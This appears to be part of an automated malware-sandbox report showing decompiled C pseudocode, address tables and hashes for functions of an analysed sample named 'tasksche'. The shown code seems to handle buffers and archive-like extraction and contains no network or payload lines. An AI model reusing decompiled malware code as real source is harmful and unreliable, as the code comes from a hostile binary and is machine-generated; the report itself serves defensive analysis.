                                                                                              									_t349 = _t347 + 0xc;
                                                                                              									__eflags =  *(_t343 + 8) & 0x00000010;
                                                                                              									_t328[0x16] = 0x3c000;
                                                                                              									_t328[0x18] = _t328[2];
                                                                                              									if(( *(_t343 + 8) & 0x00000010) == 0) {
                                                                                              										L49:
                                                                                              										__eflags =  *((char*)(_t343 + 0x13));
                                                                                              										if(__eflags == 0) {
                                                                                              											_t334 =  *(_t343 - 0x1c);
                                                                                              											L60:
                                                                                              											_t328[9] =  *(_t334 + 0x14);
                                                                                              											_t328[0xa] =  *(_t334 + 0x28);
                                                                                              											_t203 =  *(_t334 + 0x40);
                                                                                              											 *(_t343 + 0x10) = _t203;
                                                                                              											__eflags = _t203 - 1 - 0x1ffe;
                                                                                              											if(_t203 - 1 <= 0x1ffe) {
                                                                                              												_t136 =  &(_t328[0xf]); // 0x3c
                                                                                              												E00401106(_t136, _t203);
                                                                                              												E0041C290(_t136, _t328, _t334,  *_t136,  *((intOrPtr*)(_t334 + 0x3c)),  *(_t343 + 0x10));
                                                                                              												_t349 = _t349 + 0xc;
                                                                                              											}
                                                                                              											__eflags = _t328[0xc] - 0x40;
                                                                                              											if(_t328[0xc] < 0x40) {
                                                                                              												_t140 =  &(_t328[0xb]); // 0x2c
                                                                                              												E00401B67(_t140);
                                                                                              												E00401106(_t140, 0x40);
                                                                                              											}
                                                                                              											_t141 =  &(_t328[0xb]); // 0x2c
                                                                                              											_t269 = _t141;
                                                                                              											_t335 =  *_t269;
                                                                                              											_t142 =  &(_t328[0x13]); // 0x4c
                                                                                              											 *(_t343 + 0xc) = _t335;
                                                                                              											 *(_t343 + 0x10) = _t142;
                                                                                              											 *(_t343 - 0x20) = 7;
                                                                                              											do {
                                                                                              												E0040AB4B( *(_t343 + 0xc),  *( *(_t343 + 0x10)));
                                                                                              												 *(_t343 + 0x10) =  *(_t343 + 0x10) + 4;
                                                                                              												 *(_t343 + 0xc) =  *(_t343 + 0xc) + 4;
                                                                                              												_t153 = _t343 - 0x20;
                                                                                              												 *_t153 =  *(_t343 - 0x20) - 1;
                                                                                              												__eflags =  *_t153;
                                                                                              											} while ( *_t153 != 0);
                                                                                              											_t157 = _t335 + 0x1c; // 0x48
                                                                                              											E0040AB4B(_t157, _t328[1]);
                                                                                              											_t159 = _t335 + 0x20; // 0x4c
                                                                                              											E0040AB4B(_t159, 0);
                                                                                              											_t162 = _t335 + 0x2c; // 0x58
                                                                                              											E0040AB4B(_t162, _t328[2]);
                                                                                              											E0041A820(_t328, _t335 + 0x30, 0, 0x10);
                                                                                              											__eflags =  *(_t343 + 8) & 0x00000008;
                                                                                              											if(( *(_t343 + 8) & 0x00000008) == 0) {
                                                                                              												L74:
                                                                                              												_t181 = 1;
                                                                                              												L17:
                                                                                              												 *[fs:0x0] =  *((intOrPtr*)(_t343 - 0xc));
                                                                                              												return _t181;
                                                                                              											}
                                                                                              											_t214 =  *((intOrPtr*)(_t343 - 0x10));
                                                                                              											__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t343 - 0x10)))) + 3 - 0x8000;
                                                                                              											if(__eflags >= 0) {
                                                                                              												goto L16;
                                                                                              											}
                                                                                              											_t215 = E0040AB58(__eflags, _t214);
                                                                                              											 *(_t343 + 8) = _t215;
                                                                                              											__eflags = _t215 - 0x1fc0;
                                                                                              											if(_t215 > 0x1fc0) {
                                                                                              												goto L16;
                                                                                              											}
                                                                                              											_t329 = _t328[0xc];
                                                                                              											_t169 = _t215 + 0x40; // 0x40
                                                                                              											__eflags = _t329 - _t169;
                                                                                              											if(_t329 < _t169) {
                                                                                              												__eflags = _t215 - _t329 + 0x40;
                                                                                              												E00401106(_t269, _t215 - _t329 + 0x40);
                                                                                              											}
                                                                                              											_t330 = 0;
                                                                                              											_t338 =  *_t269 + 0x40;
                                                                                              											__eflags =  *(_t343 + 8);
                                                                                              											if( *(_t343 + 8) <= 0) {
                                                                                              												goto L74;
                                                                                              											} else {
                                                                                              												while(1) {
                                                                                              													_t270 =  *((intOrPtr*)(_t343 - 0x10));
                                                                                              													__eflags =  *_t270 + 3 - 0x8000;
                                                                                              													if( *_t270 + 3 >= 0x8000) {
                                                                                              														goto L16;
                                                                                              													}
                                                                                              													 *((char*)(_t330 + _t338)) = E004097D1(_t270) >> 8;
                                                                                              													E004097BA(_t270, 8);
                                                                                              													_t330 = _t330 + 1;
                                                                                              													__eflags = _t330 -  *(_t343 + 8);
                                                                                              													if(_t330 <  *(_t343 + 8)) {
                                                                                              														continue;
                                                                                              													}
                                                                                              													goto L74;
                                                                                              												}
                                                                                              												goto L16;
                                                                                              											}
                                                                                              										}
                                                                                              										_t272 = E0040AB58(__eflags,  *((intOrPtr*)(_t343 - 0x10)));
                                                                                              										 *(_t343 + 0x10) = _t272;
                                                                                              										__eflags = _t272 - 0x10000;
                                                                                              										if(_t272 >= 0x10000) {
                                                                                              											goto L16;
                                                                                              										}
                                                                                              										_t340 = 0;
                                                                                              										__eflags = _t272;
                                                                                              										if(_t272 == 0) {
                                                                                              											goto L16;
                                                                                              										}
                                                                                              										E00406760(_t343 - 0x30, _t272);
                                                                                              										__eflags = _t272;
                                                                                              										_t273 =  *(_t343 - 0x30);
                                                                                              										 *(_t343 - 4) = 0;
                                                                                              										if(_t272 <= 0) {
                                                                                              											L55:
                                                                                              											_t334 =  *(_t343 - 0x1c);
                                                                                              											E0040AD8E( *((intOrPtr*)(_t343 - 0x14)), _t273,  *(_t343 + 0x10), _t334 + 0x14);
                                                                                              											 *(_t343 - 4) =  *(_t343 - 4) | 0xffffffff;
                                                                                              											__eflags = _t273;
                                                                                              											if(__eflags != 0) {
                                                                                              												_push(_t273);
                                                                                              												E0041A506(_t273, _t328, _t334, __eflags);
                                                                                              											}
                                                                                              											goto L60;
                                                                                              										} else {
                                                                                              											goto L53;
                                                                                              										}
                                                                                              										while(1) {
                                                                                              											L53:
                                                                                              											_t299 =  *((intOrPtr*)(_t343 - 0x10));
                                                                                              											__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t343 - 0x10)))) + 3 - 0x8000;
                                                                                              											if( *((intOrPtr*)( *((intOrPtr*)(_t343 - 0x10)))) + 3 >= 0x8000) {
                                                                                              												break;
                                                                                              											}
                                                                                              											 *((char*)(_t273 + _t340)) = E004097D1(_t299) >> 8;
                                                                                              											E004097BA( *((intOrPtr*)(_t343 - 0x10)), 8);
                                                                                              											_t340 = _t340 + 1;
                                                                                              											__eflags = _t340 -  *(_t343 + 0x10);
                                                                                              											if(_t340 <  *(_t343 + 0x10)) {
                                                                                              												continue;
                                                                                              											}
                                                                                              											goto L55;
                                                                                              										}
                                                                                              										__eflags = _t273;
                                                                                              										if(__eflags != 0) {
                                                                                              											_push(_t273);
                                                                                              											E0041A506(_t273, _t328, _t340, __eflags);
                                                                                              										}
                                                                                              										goto L16;
                                                                                              									}
                                                                                              									_t342 = E004097D1( *((intOrPtr*)(_t343 - 0x10))) >> 9;
                                                                                              									E004097BA( *((intOrPtr*)(_t343 - 0x10)), 7);
                                                                                              									_t103 = _t343 + 0xc;
                                                                                              									 *_t103 =  *(_t343 + 0xc) & 0x00000000;
                                                                                              									__eflags =  *_t103;
                                                                                              									do {
                                                                                              										__eflags = _t342 & 1 <<  *(_t343 + 0xc);
                                                                                              										if(__eflags != 0) {
                                                                                              											 *_t268 = E0040AB58(__eflags,  *((intOrPtr*)(_t343 - 0x10)));
                                                                                              										}
                                                                                              										 *(_t343 + 0xc) =  *(_t343 + 0xc) + 1;
                                                                                              										_t268 =  &(_t268[1]);
                                                                                              										__eflags =  *(_t343 + 0xc) - 7;
                                                                                              									} while ( *(_t343 + 0xc) < 7);
                                                                                              									goto L49;
                                                                                              								}
                                                                                              							} else {
                                                                                              								goto L24;
                                                                                              							}
                                                                                              							do {
                                                                                              								L24:
                                                                                              								 *((intOrPtr*)( *((intOrPtr*)(_t332 + 0xe6b4)) + (_t185 -  *(_t343 - 0x18)) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t332 + 0xe6b4)) + _t185 * 4));
                                                                                              								_t250 =  *(_t343 - 0x20);
                                                                                              								_t310 =  *((intOrPtr*)(_t332 + 0xe6b4)) + _t250 * 4;
                                                                                              								__eflags =  *_t310;
                                                                                              								if( *_t310 == 0) {
                                                                                              									_t55 = _t343 - 0x18;
                                                                                              									 *_t55 =  *(_t343 - 0x18) + 1;
                                                                                              									__eflags =  *_t55;
                                                                                              								}
                                                                                              								_t321 =  *(_t343 - 0x18);
                                                                                              								__eflags = _t321;
                                                                                              								if(_t321 > 0) {
                                                                                              									 *_t310 =  *_t310 & 0x00000000;
                                                                                              									__eflags =  *_t310;
                                                                                              								}
                                                                                              								_t185 = _t250 + 1;
                                                                                              								 *(_t343 - 0x20) = _t185;
                                                                                              								__eflags = _t185 -  *(_t332 + 0xe6b8);
                                                                                              							} while (_t185 <  *(_t332 + 0xe6b8));
                                                                                              							__eflags = _t321;
                                                                                              							if(__eflags != 0) {
                                                                                              								goto L32;
                                                                                              							}
                                                                                              							goto L30;
                                                                                              						}
                                                                                              						if(_t328 != 0) {
                                                                                              							E00414F64(_t264, _t328, _t328, _t343, 1);
                                                                                              						}
                                                                                              						goto L16;
                                                                                              					}
                                                                                              				}
                                                                                              			}

















































                                                                                              0x00416790
                                                                                              0x00416795
                                                                                              0x0041679a
                                                                                              0x0041679f
                                                                                              0x004167a1
                                                                                              0x004167aa
                                                                                              0x004167b2
                                                                                              0x004167b5
                                                                                              0x004167b8
                                                                                              0x004167ba
                                                                                              0x004167bc
                                                                                              0x004167bc
                                                                                              0x004167c9
                                                                                              0x004167d4
                                                                                              0x004167d7
                                                                                              0x004167da
                                                                                              0x004167df
                                                                                              0x004167e3
                                                                                              0x00416804
                                                                                              0x0041680a
                                                                                              0x0041680d
                                                                                              0x004167e5
                                                                                              0x004167eb
                                                                                              0x004167ed
                                                                                              0x004167f2
                                                                                              0x004167fe
                                                                                              0x004167ff
                                                                                              0x004167f4
                                                                                              0x004167f7
                                                                                              0x004167f7
                                                                                              0x004167f2
                                                                                              0x0041680f
                                                                                              0x00416817
                                                                                              0x00416866
                                                                                              0x00416866
                                                                                              0x00000000
                                                                                              0x00416821
                                                                                              0x00416823
                                                                                              0x00416825
                                                                                              0x0041682b
                                                                                              0x00416834
                                                                                              0x00416839
                                                                                              0x00416845
                                                                                              0x00416845
                                                                                              0x0041683b
                                                                                              0x0041683b
                                                                                              0x0041683e
                                                                                              0x0041683e
                                                                                              0x0041684b
                                                                                              0x004168d8
                                                                                              0x004168db
                                                                                              0x004168de
                                                                                              0x004168e1
                                                                                              0x004168e1
                                                                                              0x004168e3
                                                                                              0x00000000
                                                                                              0x00416851
                                                                                              0x00416857
                                                                                              0x00416881
                                                                                              0x00416886
                                                                                              0x0041688d
                                                                                              0x00416890
                                                                                              0x00416892
                                                                                              0x0041689e
                                                                                              0x0041689e
                                                                                              0x00416894
                                                                                              0x00416894
                                                                                              0x00416897
                                                                                              0x00416897
                                                                                              0x004168ac
                                                                                              0x004168bf
                                                                                              0x004168c2
                                                                                              0x004168c5
                                                                                              0x004168ca
                                                                                              0x004168cd
                                                                                              0x004168e6
                                                                                              0x004168e6
                                                                                              0x004168e8
                                                                                              0x004168eb
                                                                                              0x004168ee
                                                                                              0x004168f4
                                                                                              0x0041693b
                                                                                              0x0041693b
                                                                                              0x00416945
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416953
                                                                                              0x0041695a
                                                                                              0x0041695a
                                                                                              0x0041695b
                                                                                              0x0041696c
                                                                                              0x00416971
                                                                                              0x00416974
                                                                                              0x00416979
                                                                                              0x0041697d
                                                                                              0x0041697f
                                                                                              0x00416981
                                                                                              0x00416981
                                                                                              0x00416981
                                                                                              0x00416992
                                                                                              0x00416996
                                                                                              0x00416998
                                                                                              0x004169b3
                                                                                              0x004169b6
                                                                                              0x004169bc
                                                                                              0x004169c9
                                                                                              0x004169c9
                                                                                              0x004169be
                                                                                              0x004169c4
                                                                                              0x004169c4
                                                                                              0x004169cb
                                                                                              0x0041699a
                                                                                              0x0041699d
                                                                                              0x004169a5
                                                                                              0x004169ae
                                                                                              0x004169ae
                                                                                              0x004169ce
                                                                                              0x004169d1
                                                                                              0x004169d4
                                                                                              0x004169d6
                                                                                              0x004169e9
                                                                                              0x004169e9
                                                                                              0x004169e9
                                                                                              0x00000000
                                                                                              0x004169d8
                                                                                              0x004169e0
                                                                                              0x004169e2
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004169e6
                                                                                              0x004169eb
                                                                                              0x004169ed
                                                                                              0x004169ed
                                                                                              0x004169f3
                                                                                              0x004169f6
                                                                                              0x004169fe
                                                                                              0x00416a04
                                                                                              0x00416a07
                                                                                              0x00416a0b
                                                                                              0x00416a12
                                                                                              0x00416a15
                                                                                              0x00416a54
                                                                                              0x00416a54
                                                                                              0x00416a58
                                                                                              0x00416af6
                                                                                              0x00416af9
                                                                                              0x00416afc
                                                                                              0x00416b02
                                                                                              0x00416b05
                                                                                              0x00416b0b
                                                                                              0x00416b0e
                                                                                              0x00416b14
                                                                                              0x00416b16
                                                                                              0x00416b1c
                                                                                              0x00416b29
                                                                                              0x00416b2e
                                                                                              0x00416b2e
                                                                                              0x00416b31
                                                                                              0x00416b35
                                                                                              0x00416b37
                                                                                              0x00416b3c
                                                                                              0x00416b45
                                                                                              0x00416b45
                                                                                              0x00416b4a
                                                                                              0x00416b4a
                                                                                              0x00416b4d
                                                                                              0x00416b4f
                                                                                              0x00416b52
                                                                                              0x00416b55
                                                                                              0x00416b58
                                                                                              0x00416b5f
                                                                                              0x00416b6a
                                                                                              0x00416b6f
                                                                                              0x00416b73
                                                                                              0x00416b77
                                                                                              0x00416b77
                                                                                              0x00416b77
                                                                                              0x00416b77
                                                                                              0x00416b82
                                                                                              0x00416b86
                                                                                              0x00416b90
                                                                                              0x00416b94
                                                                                              0x00416b9f
                                                                                              0x00416ba3
                                                                                              0x00416bb0
                                                                                              0x00416bb8
                                                                                              0x00416bbc
                                                                                              0x00416c38
                                                                                              0x00416c38
                                                                                              0x00416868
                                                                                              0x0041686e
                                                                                              0x00416876
                                                                                              0x00416876
                                                                                              0x00416bbe
                                                                                              0x00416bc6
                                                                                              0x00416bcc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416bd3
                                                                                              0x00416bd8
                                                                                              0x00416bdb
                                                                                              0x00416be0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416be6
                                                                                              0x00416be9
                                                                                              0x00416bec
                                                                                              0x00416bee
                                                                                              0x00416bf2
                                                                                              0x00416bf8
                                                                                              0x00416bf8
                                                                                              0x00416bff
                                                                                              0x00416c01
                                                                                              0x00416c04
                                                                                              0x00416c07
                                                                                              0x00000000
                                                                                              0x00416c09
                                                                                              0x00416c09
                                                                                              0x00416c09
                                                                                              0x00416c11
                                                                                              0x00416c16
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416c2a
                                                                                              0x00416c2d
                                                                                              0x00416c32
                                                                                              0x00416c33
                                                                                              0x00416c36
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416c36
                                                                                              0x00000000
                                                                                              0x00416c09
                                                                                              0x00416c07
                                                                                              0x00416a66
                                                                                              0x00416a68
                                                                                              0x00416a6b
                                                                                              0x00416a71
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416a77
                                                                                              0x00416a79
                                                                                              0x00416a7b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416a85
                                                                                              0x00416a8a
                                                                                              0x00416a8c
                                                                                              0x00416a8f
                                                                                              0x00416a92
                                                                                              0x00416abe
                                                                                              0x00416abe
                                                                                              0x00416acc
                                                                                              0x00416ad1
                                                                                              0x00416ad5
                                                                                              0x00416ad7
                                                                                              0x00416ad9
                                                                                              0x00416ada
                                                                                              0x00416adf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416a94
                                                                                              0x00416a94
                                                                                              0x00416a94
                                                                                              0x00416a9c
                                                                                              0x00416aa1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416ab0
                                                                                              0x00416ab3
                                                                                              0x00416ab8
                                                                                              0x00416ab9
                                                                                              0x00416abc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416abc
                                                                                              0x00416ae2
                                                                                              0x00416ae4
                                                                                              0x00416aea
                                                                                              0x00416aeb
                                                                                              0x00416af0
                                                                                              0x00000000
                                                                                              0x00416ae4
                                                                                              0x00416a26
                                                                                              0x00416a29
                                                                                              0x00416a2e
                                                                                              0x00416a2e
                                                                                              0x00416a2e
                                                                                              0x00416a32
                                                                                              0x00416a3a
                                                                                              0x00416a3c
                                                                                              0x00416a46
                                                                                              0x00416a46
                                                                                              0x00416a48
                                                                                              0x00416a4b
                                                                                              0x00416a4e
                                                                                              0x00416a4e
                                                                                              0x00000000
                                                                                              0x00416a32
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004168f6
                                                                                              0x004168f6
                                                                                              0x0041690a
                                                                                              0x00416913
                                                                                              0x00416916
                                                                                              0x00416919
                                                                                              0x0041691c
                                                                                              0x0041691e
                                                                                              0x0041691e
                                                                                              0x0041691e
                                                                                              0x0041691e
                                                                                              0x00416921
                                                                                              0x00416924
                                                                                              0x00416926
                                                                                              0x00416928
                                                                                              0x00416928
                                                                                              0x00416928
                                                                                              0x0041692b
                                                                                              0x0041692c
                                                                                              0x0041692f
                                                                                              0x0041692f
                                                                                              0x00416937
                                                                                              0x00416939
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00416939
                                                                                              0x0041685b
                                                                                              0x00416861
                                                                                              0x00416861
                                                                                              0x00000000
                                                                                              0x0041685b
                                                                                              0x0041684b

                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00416795
                                                                                                • Part of subcall function 004129F9: _realloc.LIBCMT ref: 00412A51
                                                                                                • Part of subcall function 0041A89A: _malloc.LIBCMT ref: 0041A8B4
                                                                                              • _memset.LIBCMT ref: 004169F6
                                                                                              • _memset.LIBCMT ref: 00416BB0
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.765013589.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.764991485.0000000000400000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765189068.000000000042A000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765219842.0000000000430000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765266728.0000000000435000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765314292.000000000044F000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.765323298.0000000000452000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_tasksche.jbxd
                                                                                              Similarity
                                                                                              • API ID: _memset$H_prolog_malloc_realloc
                                                                                              • String ID:
                                                                                              • API String ID: 1826288403-3916222277
                                                                                              • Opcode ID: 0d48e13bb8a277f6458225f363c78ec795d6fd62086fd03c94a99887370c8703
                                                                                              • Instruction ID: b2eea235d821e150737843ebb12b5e68f22e0a3d12c725fcd3f3b3fef6346f43
                                                                                              • Opcode Fuzzy Hash: 0d48e13bb8a277f6458225f363c78ec795d6fd62086fd03c94a99887370c8703
                                                                                              • Instruction Fuzzy Hash: 92E1BF71A007499FCB10EF65C980BEEB7B1FF14304F11482EE956A7281DB39E991CB59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 93%
                                                                                              			E00418B3D(intOrPtr __edx, intOrPtr* _a4, char _a7, signed int _a8, char _a11, short _a16) {
                                                                                              				intOrPtr _v8;
                                                                                              				intOrPtr _v12;
                                                                                              				intOrPtr _v16;
                                                                                              				intOrPtr _v20;
                                                                                              				intOrPtr _v24;
                                                                                              				char _v4120;
                                                                                              				char _v8216;
                                                                                              				void* __ebx;
                                                                                              				void* __ebp;
                                                                                              				intOrPtr _t93;
                                                                                              				intOrPtr _t107;
                                                                                              				signed int _t116;
                                                                                              				signed int _t123;
                                                                                              				intOrPtr _t137;
                                                                                              				signed int _t150;
                                                                                              				intOrPtr _t151;
                                                                                              				intOrPtr* _t157;
                                                                                              				intOrPtr* _t166;
                                                                                              				intOrPtr _t178;
                                                                                              				intOrPtr _t180;
                                                                                              				signed int _t183;
                                                                                              				intOrPtr _t184;
                                                                                              				intOrPtr* _t187;
                                                                                              				void* _t188;
                                                                                              
                                                                                              				_t178 = __edx;
                                                                                              				E0041AAF0(0x2014);
                                                                                              				_t187 = _a4;
                                                                                              				_v12 =  *((intOrPtr*)(_t187 + 0x6524));
                                                                                              				_t93 =  *((intOrPtr*)(_t187 + 0x6544));
                                                                                              				_v16 = _t93;
                                                                                              				if(_t93 != 3) {
                                                                                              					_t151 = _t187 + 0x65e8;
                                                                                              					_v8 = _t151;
                                                                                              					_t180 = _t151;
                                                                                              					__eflags = _t93 - 2;
                                                                                              					if(__eflags != 0) {
                                                                                              						L4:
                                                                                              						_a7 = 0;
                                                                                              						L5:
                                                                                              						_t150 = _a8;
                                                                                              						if(_t150 == 0 || _a7 == 0) {
                                                                                              							L12:
                                                                                              							_v24 =  *((intOrPtr*)( *_t187 + 0x10))();
                                                                                              							_v20 = _t178;
                                                                                              							if(_t150 != 0) {
                                                                                              								 *((intOrPtr*)(_t150 + 0x21f8)) =  *((intOrPtr*)(_t150 + 0x21f8)) + E00408E03(_t187, _t178);
                                                                                              								asm("adc [edi+0x4], edx");
                                                                                              							}
                                                                                              							E00408A32(_t187);
                                                                                              							E0040A8A1( &_v4120, 0x800, (E0041A7F7( &_v4120, _t187 + 0x1e) & 0xffffff00 |  *((char*)(_t187 + 0xb05a)) == 0x00000000) & 0x000000ff);
                                                                                              							asm("sbb edi, edi");
                                                                                              							_a11 = 0;
                                                                                              							_t183 =  ~( *(_v12 + 0x5195) & 0x000000ff) & 0x00000004;
                                                                                              							while(1) {
                                                                                              								_push(_t183);
                                                                                              								_push( &_v4120);
                                                                                              								_t157 = _t187;
                                                                                              								if( *((intOrPtr*)( *_t187 + 4))() != 0) {
                                                                                              									break;
                                                                                              								}
                                                                                              								__eflags = _t150;
                                                                                              								if(_t150 != 0) {
                                                                                              									 *(_t150 + 0x2200) =  *(_t150 + 0x2200) & 0x00000000;
                                                                                              									_t38 = _t150 + 0x2204;
                                                                                              									 *_t38 =  *(_t150 + 0x2204) & 0x00000000;
                                                                                              									__eflags =  *_t38;
                                                                                              								}
                                                                                              								__eflags = _a11;
                                                                                              								if(_a11 != 0) {
                                                                                              									L19:
                                                                                              									_t107 = _v12;
                                                                                              									__eflags =  *((char*)(_t107 + 0x517c));
                                                                                              									if( *((char*)(_t107 + 0x517c)) != 0) {
                                                                                              										L25:
                                                                                              										E00406376(0x44,  &_v4120);
                                                                                              										 *((intOrPtr*)( *_t187 + 4))(_t187 + 0x1e, _t183);
                                                                                              										 *((intOrPtr*)( *_t187 + 0xc))(_v24, _v20, 0);
                                                                                              										return 0;
                                                                                              									}
                                                                                              									_t116 = L00411987(_t157,  &_v4120, 0x800);
                                                                                              									__eflags = _t116;
                                                                                              									if(_t116 == 0) {
                                                                                              										goto L25;
                                                                                              									}
                                                                                              									continue;
                                                                                              								} else {
                                                                                              									E0041A7F7( &_v8216, _t187 + 0x1e);
                                                                                              									E0040A8A1( &_v8216, 0x800, 1);
                                                                                              									_t157 = _t187;
                                                                                              									_a11 = 1;
                                                                                              									_t123 =  *((intOrPtr*)( *_t187 + 4))( &_v8216, _t183);
                                                                                              									__eflags = _t123;
                                                                                              									if(_t123 != 0) {
                                                                                              										E0041A7F7( &_v4120,  &_v8216);
                                                                                              										break;
                                                                                              									}
                                                                                              									goto L19;
                                                                                              								}
                                                                                              							}
                                                                                              							E004116C9((_t187 + 0x0000001e & 0xffffff00 | _a16 != 0x00000054) & 0x000000ff, (_t187 + 0x0000001e & 0xffffff00 | _a16 != 0x00000054) & 0x000000ff, _t187 + 0x1e);
                                                                                              							E004019E7(_t187, _t178, _t188, _a16 - 0x54, 1);
                                                                                              							_t202 = _a7;
                                                                                              							_t166 = _t187;
                                                                                              							if(_a7 == 0) {
                                                                                              								E0040369F(_t178, _t188);
                                                                                              							} else {
                                                                                              								E0040370E(_t166, _t178, _t202, _v16);
                                                                                              							}
                                                                                              							if( *((intOrPtr*)(_t187 + 0x6544)) == 2) {
                                                                                              								E00401A5C(_t187);
                                                                                              								_t178 =  *((intOrPtr*)(_t187 + 0xb04c));
                                                                                              								asm("sbb edx, [esi+0x7634]");
                                                                                              								 *((intOrPtr*)( *_t187 + 0xc))( *((intOrPtr*)(_t187 + 0xb048)) -  *((intOrPtr*)(_t187 + 0x7630)), _t178, 0);
                                                                                              							}
                                                                                              							if(_t150 != 0) {
                                                                                              								_t184 = _v8;
                                                                                              								if(_v16 != 5) {
                                                                                              									 *((char*)(_t150 + 0x21c7)) =  *((intOrPtr*)(_t184 + 0x1089));
                                                                                              									 *((intOrPtr*)(_t150 + 0x20)) =  *((intOrPtr*)(_t184 + 0x1048));
                                                                                              									 *((intOrPtr*)(_t150 + 0x24)) =  *((intOrPtr*)(_t184 + 0x104c));
                                                                                              								} else {
                                                                                              									 *((char*)(_t150 + 0x21c7)) = 0;
                                                                                              								}
                                                                                              								_t137 = E00408E03(_t187, _t178);
                                                                                              								 *(_t150 + 0x21e8) =  *(_t150 + 0x21e8) & 0x00000000;
                                                                                              								 *(_t150 + 0x21ec) =  *(_t150 + 0x21ec) & 0x00000000;
                                                                                              								 *((intOrPtr*)(_t150 + 0x21d0)) = _t137;
                                                                                              								 *((intOrPtr*)(_t150 + 0x21d4)) = _t178;
                                                                                              								E00409885(_t150 + 0x2208,  *((intOrPtr*)(_t184 + 0x1060)),  *((intOrPtr*)(_v12 + 0x7298)));
                                                                                              							}
                                                                                              							return 1;
                                                                                              						} else {
                                                                                              							if( *((intOrPtr*)(_t187 + 0xb050)) == 3) {
                                                                                              								L10:
                                                                                              								asm("sbb ecx, ecx");
                                                                                              								if(E00409AE9(_t150, _t150 + 0x2208, _t178, _t195, _t180 + 0x1060,  ~( *(_t180 + 0x10ba) & 0x000000ff) & _t180 + 0x000010bb) == 0) {
                                                                                              									E0040639F(5, _t187 + 0x1e, _t180 + 0x20);
                                                                                              								}
                                                                                              								goto L12;
                                                                                              							}
                                                                                              							if( *((char*)(_t180 + 0x19)) < 0x14) {
                                                                                              								goto L12;
                                                                                              							}
                                                                                              							_t195 =  *((intOrPtr*)(_t180 + 0x1064)) - 0xffffffff;
                                                                                              							if( *((intOrPtr*)(_t180 + 0x1064)) == 0xffffffff) {
                                                                                              								goto L12;
                                                                                              							}
                                                                                              							goto L10;
                                                                                              						}
                                                                                              					}
                                                                                              					L3:
                                                                                              					_a7 = 1;
                                                                                              					if( *((char*)(_t180 + 0x1089)) != 0) {
                                                                                              						goto L5;
                                                                                              					}
                                                                                              					goto L4;
                                                                                              				}
                                                                                              				_t180 = _t187 + 0x8928;
                                                                                              				_v8 = _t180;
                                                                                              				goto L3;
                                                                                              			}



























                                                                                              0x00418b3d
                                                                                              0x00418b45
                                                                                              0x00418b4c
                                                                                              0x00418b55
                                                                                              0x00418b58
                                                                                              0x00418b5f
                                                                                              0x00418b65
                                                                                              0x00418b72
                                                                                              0x00418b78
                                                                                              0x00418b7b
                                                                                              0x00418b7d
                                                                                              0x00418b80
                                                                                              0x00418b8f
                                                                                              0x00418b8f
                                                                                              0x00418b93
                                                                                              0x00418b93
                                                                                              0x00418b98
                                                                                              0x00418bf1
                                                                                              0x00418bf8
                                                                                              0x00418bfb
                                                                                              0x00418c00
                                                                                              0x00418c0f
                                                                                              0x00418c11
                                                                                              0x00418c11
                                                                                              0x00418c16
                                                                                              0x00418c47
                                                                                              0x00418c58
                                                                                              0x00418c5a
                                                                                              0x00418c5e
                                                                                              0x00418cd8
                                                                                              0x00418cda
                                                                                              0x00418ce1
                                                                                              0x00418ce2
                                                                                              0x00418ce9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00418c63
                                                                                              0x00418c65
                                                                                              0x00418c67
                                                                                              0x00418c6e
                                                                                              0x00418c6e
                                                                                              0x00418c6e
                                                                                              0x00418c6e
                                                                                              0x00418c75
                                                                                              0x00418c79
                                                                                              0x00418cb7
                                                                                              0x00418cb7
                                                                                              0x00418cba
                                                                                              0x00418cc1
                                                                                              0x00418d36
                                                                                              0x00418d3f
                                                                                              0x00418d4d
                                                                                              0x00418d5c
                                                                                              0x00000000
                                                                                              0x00418d5f
                                                                                              0x00418ccf
                                                                                              0x00418cd4
                                                                                              0x00418cd6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00418c7b
                                                                                              0x00418c86
                                                                                              0x00418c9b
                                                                                              0x00418caa
                                                                                              0x00418cac
                                                                                              0x00418cb0
                                                                                              0x00418cb3
                                                                                              0x00418cb5
                                                                                              0x00418d2d
                                                                                              0x00000000
                                                                                              0x00418d33
                                                                                              0x00000000
                                                                                              0x00418cb5
                                                                                              0x00418c79
                                                                                              0x00418cff
                                                                                              0x00418d08
                                                                                              0x00418d0d
                                                                                              0x00418d11
                                                                                              0x00418d13
                                                                                              0x00418d66
                                                                                              0x00418d15
                                                                                              0x00418d18
